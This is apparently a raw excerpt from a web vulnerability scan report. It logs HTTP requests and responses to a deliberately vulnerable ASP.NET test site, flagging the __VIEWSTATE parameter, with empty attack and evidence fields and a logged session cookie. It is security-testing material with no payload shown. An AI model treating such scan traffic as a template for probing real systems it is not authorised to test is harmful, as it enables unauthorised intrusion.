Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8524&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBACYEyTNsIZGRkdfxxFM9pQ882cW7B7OXKKSPV1PU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLIl6vbAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxQDnzo9tgxIvid5dPETdEkZm2Tl
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:04 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBACYEyTNsIZGRkdfxxFM9pQ882cW7B7OXKKSPV1PU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLIl6vbAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxQDnzo9tgxIvid5dPETdEkZm2Tl" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:White" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8528&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAsCpXT9sIZGRkwtvPC8Uwr3E4chref9tgqHCtY5M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLl596GDwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA0ZSS%2BCeAS0yBhvr7JuOrK5HM9MM
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:40 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAsCpXT9sIZGRkwtvPC8Uwr3E4chref9tgqHCtY5M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLl596GDwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA0ZSS+CeAS0yBhvr7JuOrK5HM9MM" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:White" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
